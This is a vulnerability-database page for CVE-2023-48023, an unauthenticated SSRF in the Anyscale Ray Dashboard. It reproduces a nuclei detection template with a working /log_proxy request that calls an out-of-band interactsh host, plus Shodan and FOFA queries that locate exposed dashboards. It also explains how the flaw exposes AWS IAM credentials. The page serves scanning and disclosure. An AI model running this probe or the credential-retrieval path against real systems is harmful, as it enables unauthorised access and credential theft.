Lucene search
K

Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 92 Views

Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery vulnerability impacts Ray Dashboard's API, allowing unauthenticated access to AWS IAM credential

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-48023
28 Nov 202308:15
attackerkb
Circl
CVE-2023-48023
17 Dec 202316:42
circl
CNNVD
Ray Security breach
28 Nov 202300:00
cnnvd
CVE
CVE-2023-48023
28 Nov 202300:00
cve
CVE
CVE-2023-6019
16 Nov 202316:12
cve
Cvelist
CVE-2023-48023
28 Nov 202300:00
cvelist
Github Security Blog
Ray Path Traversal vulnerability
16 Nov 202318:30
github
Github Security Blog
Ray Missing Authorization vulnerability
16 Nov 202321:30
github
Github Security Blog
Ray OS Command Injection vulnerability
16 Nov 202318:30
github
NVD
CVE-2023-48023
28 Nov 202308:15
nvd
Rows per page
id: CVE-2023-48023

info:
  name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
  author: cookiehanhoan,harryha
  severity: critical
  description: |
    The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
  impact: |
    The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
    - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-48023
    cwe-id: CWE-441,CWE-918
    epss-score: 0.35052
    epss-percentile: 0.98238
  metadata:
    verified: true
    max-request: 1
    vendor: ray_project
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    product: ray
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,ssrf,ray,anyscale,Anyscale,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100bc2b3c94150a4733afc7ecfbe940ccb337837a267dfd511c3eb7c503fa52942b022014ff3a29176c271365a9300bba147d221de6e8bf37ab684bf355b99e18589ef5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.1
EPSS0.35052
SSVC
92